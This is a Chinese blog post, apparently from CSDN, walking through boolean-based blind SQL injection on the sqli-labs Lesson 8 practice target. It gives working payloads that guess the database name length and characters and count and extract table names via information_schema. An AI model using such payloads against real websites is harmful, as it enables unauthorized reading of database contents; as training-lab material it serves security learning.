sqli labs lesson 8,布尔盲注

最新推荐文章于 2024-12-03 10:45:00 发布
原创 最新推荐文章于 2024-12-03 10:45:00 发布 · 3.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

本文详细介绍了布尔盲注的概念及应用,通过实例展示了如何利用布尔盲注确定数据库名和表名。首先解释了布尔盲注是通过页面返回的真假信息推测数据库信息,然后通过注入点判断数据库名的长度,并使用ASCII码确定每个字符,最终揭示了数据库名为'security'。接着,文章演示了获取表名的过程,包括确定表的数量和猜表名的策略,利用length()、count()、ord()和substr()等函数逐步获取信息。

1.什么是布尔盲注

布尔盲注是指,利用页面返回的对错信息来间接推测数据库中的信息。

2.获取数据库名

注入点很容易判断,是一个单引号的注入。

接着开始布尔盲注,我们首先当前获取数据库的名称:

id=1'and length(database())=20--+

手工注入的话先用>或者<来判断表长度的大致范围,我这里用Burpsuite,直接写了等于号

可以看到当值为8时,页面返回的是You are in,说明数据库名的长度为8

那接下来就可以挨个判断每个位置的字符了

and ord(substr(database(),1,1))=128
  • ord()的作用就是将字符转换成对应的ASCII码
  • substr(‘str’,index,len),有三个参数,作用是将字符串str,从index的位置开始截取,一共截取len个字符(下标是从1开始的)

 这里看到第一个字符的ascii码是115,查询一下对应着字符s,接下来的步骤是一样的,最终查询到当前数据库的名称是security

3.获取表名

首先要获取一共有多少张表:

id=1'and (select count(table_name) from information_schema.tables 
where table_schema=database())=4--+

得知一共有四张表,接下来就和获取数据库名一样了:

猜表名长度:

and length(substr((select table_name from information_schema.tables 
where table_schema=database()limit 0,1),1))=5--+

猜表的具体名称:

and ord(substr((select table_name from information_schema.tables 
where table_schema=database()limit 0,1),1,1))=101--+

接着完全是雷同的操作,不再赘述,总之布尔注入只需要按照一定的策略,来确定所需的信息即可,常用的函数有

length():用于名称的长度

count():用于获得数据库,表,字段的个数

ord(),substr():用于获得具体的值

书犹药也
关注
SQL盲注-实战布尔盲注
dkxkl1314的博客
03-09 3516
环境:win10靶场:sqli-labs-master盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为盲注。而布尔盲注就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
sqli-labs-基于布尔的盲注
zlloveyouforever的博客
04-29 1239
sqli-labs第五关--基于布尔的盲注
Sqli-labs-master靶场--布尔盲注
ningwangh的博客
08-05 1116
布尔盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面,布尔盲注通常是由于开发者将报错信息屏蔽而导致的,但是网页中真和假有着不同的回显,比如为真时返回access,为假时返回false;如上图所示,如果数据库名的第一个字符的ascii码值等于97,则页面显示正确的页面,如果数据库名的第一个字符的ascii码值不等于97,则页面显示错误的页面,可以通过这种方式获取到数据库名,但效率过于低下,所以我们使用脚本来获取数据库名。id=1' 后,显示与上方不同,存在注入点。
sqli-labs笔记(4)盲注(布尔,时间)
weixin_43798683的博客
04-23 588
盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。 Length():函数 返回字符串的长度 Substr():截取字符串 Ascii():返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3): 判断语句 如果第一个语句正确就执行第二个语句如果...
sqli-labs通关-------08lesson-布尔盲注(单引号)
枯藤闲画云
07-05 344
页面没有回显和报错这时我们留需要考虑一下盲注了 关于时间盲注和布尔盲注的区别 布尔盲注 界面没有报错回显但是会有明显变化,比我我们写错了url会有内容丢失网页内容丢失的现象。 时间盲注:就是没有报错页面也没有变化,此时就要考虑时间盲注了。 对于lesson 8 首先尝试 ?id=1 and 1=2--+,发现页面正常 我们多半要怀疑标点符号未闭合导致 sql语句转换的问题所以我...
SQL布尔盲注_sqli-labs_08通过布尔盲注,获取数据库名字
weixin_42786460的博客
08-30 429
SQL布尔盲注
sqlilab--writeup (5~6) 布尔盲注
weixin_45694388的博客
12-07 311
1.# 和 – (有个空格)表示注释,可以使它们后面的语句不被执行。在url中,如果是get请求**(记住是get请求,也就是我们在浏览器中输入的url)** ,解释执行的时候,url中#号是用来指导浏览器动作的,对服务器端无用。所以,HTTP请求中不包括#,因此使用#闭合无法注释,会报错;而使用-- (有个空格),在传输过程中空格会被忽略,同样导致无法注释,所以在get请求传参注入时才会使用–+的方式来闭合,因为+会被解释成空格。 . 2.当然,也可以使用–%20,把空格转换为urlencode编码格式.
sql-libs第八关 布尔盲注脚本
weixin_74062643的博客
11-28 406
第一次练习写脚本的记录,还可以使用二分查找改进速度。注入语句逻辑写在注释里了。但是目前没精力改进了。这里一直爆到列名结束。
sqli-labs lesson 11-15 通关 解析 学习sql注入
weixin_44286136的博客
05-19 425
lesson 11
SQL注入之盲注(布尔盲注
Marsper的博客
09-23 1016
SQL注入之盲注 SQL注入之布尔注入 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔的盲注。 布尔型:页面只返回True和False两种类型页面。利用页面返回不同,逐个猜解数据 首先我们还是以sqli-labs为载体,第lesson 8。 输入 ?id='1' and 1= 2 -- 页面显示错误,可进行盲注 首先认识几个函数: length()函数:返回字符串的长度 subst
SQLIlabs-master(报错型、布尔型、盲注型sql注入)
Hala
04-12 756
第五、六关 说明:此关为报错型sql注入,意思是,输入信息只有报的错误信息,即不是像前几关一样,直接显示出来想要的数据 注入思路: 没有正常的输出位,需要的数据通过报错进行输出显示 步骤: 前几步与前几关的思路相同,即先判断出来闭合符,输出列数(order by二分法),然后就要用分组的group by语句将不确定的分组进行打印,那么打印的肯定是错误的,即利用打印出来的错误...
Sqli-labs 复习 Less08 布尔型sql盲注 - GET
kevinhanser
08-11 544
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 布尔型 sql 盲注 Less-8 布尔型sql盲注-单引号 测试 payload ?id=1'or 1=1--+ 四种方法讲解: left() ascii()、substr() regexp ord()、mid() 其中: left(strin...
SQL盲注(布尔盲注
Dug123456_的博客
04-07 4028
flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束。再大循环i次(遍历所有表),内嵌循环j次(表名的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表名全是小写英文字符)尝试获取每个表的表名。1 and length(database())=4 //判断数据库名字的长度是否为4。
sqli-labs8关(布尔盲注
weixin_45626840的博客
04-25 1546
概念: 布尔盲注:页面回显信息只有“真”与“假”两种状态,通过将猜测的值与ASCII码比较返回真假值进验证。 步骤: 1.求闭合字符 2.求当前数据库名的长度 3.求当前数据库名的ASCII值 4.求表的数量 5.求表名的长度 6.求表名对应的ASCII值 7.求列的数量 8.求列名的长度 9求列名对应的ASCII值 10.求字段数量 11.求字段长度 12.求字段对应ASCII值 思路: 1、判断注入点: 2、求库名长度------id=1’ and length(database())=8 --+
布尔型盲注(sqli第八关)
NLXHBM的博客
04-20 3423
1.求闭合字符 由此可以判断是单引号闭合字符 2.求当前数据库名的长度 二分法 ?id=1’ and length(database())=8 数据库名的长度为8 3.求当前数据库名对应的ASCII值 ?Id=1’ and ascii(substr(database(),1,1))=115 数据库名第一个字符对应的ASCII值为 115 s 数据库名第二个字符对应的ASCII值为101 e ...
sqli-labs第八关(布尔盲注
qq_42266432的博客
08-19 1736
第八关看标题可知此关可以使用布尔盲注布尔盲注我的理解是页面不会回显错误,但是注入等式或不等式时通过页面的反应能判断出注入中算式的true或false 布尔盲注的步骤如下: 获取数据库长度 获取数据库名 获取数据库表 获取表中字段 获取表中数据 先拿获取数据库长度举例 可以看到在length(database())>7时页面正常,length(database())>8时页面异常,即8>7=true,8>8=false,所以数据库名长度为8 再比如获取表名: 同理,sub
sql_lab之sqli中的布尔盲注(Boolean)less8
qq_59020256的博客
12-22 1536
<b></b>
SQL注入--布尔盲注
qq_37107430的博客
12-03 1801
盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。
SQLi-Labs刷题记录】第八关思路 布尔盲注
gavinmao97的博客
12-16 1215
/* 作者刚刚接触sql注入,本文仅用作记录刷sqli-labs靶场时的思路,仅代表个人看法,如有不当之处,欢迎各位大佬及时批评指正! */ 根据关卡名称可知,sqli-labs第八关的考点是布尔盲注SQLi-Labs Less-8 第一步,根据关卡名称提示可知,本题的注入点需要构造一个闭合的单引号对 构建url: …/Less-8/?id=8’ 页面无显示 构建url: …/Less-8/?id=8’ --+ 页面显示正常 根据页面回显可知,本关的反馈结果只有“You are in”或者没有反馈,而
sqli-labs布尔盲注
最新发布
03-12
### SQLi-Labs布尔盲注教程及实例分析 #### 什么是SQL盲注 SQL盲注是指在SQL注入过程中,当SQL语句执行的结果无法直接回显到前端页面时所采用的一种攻击方式。此时需借助特定的方法来推断数据库结构或数据内容[^1]...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值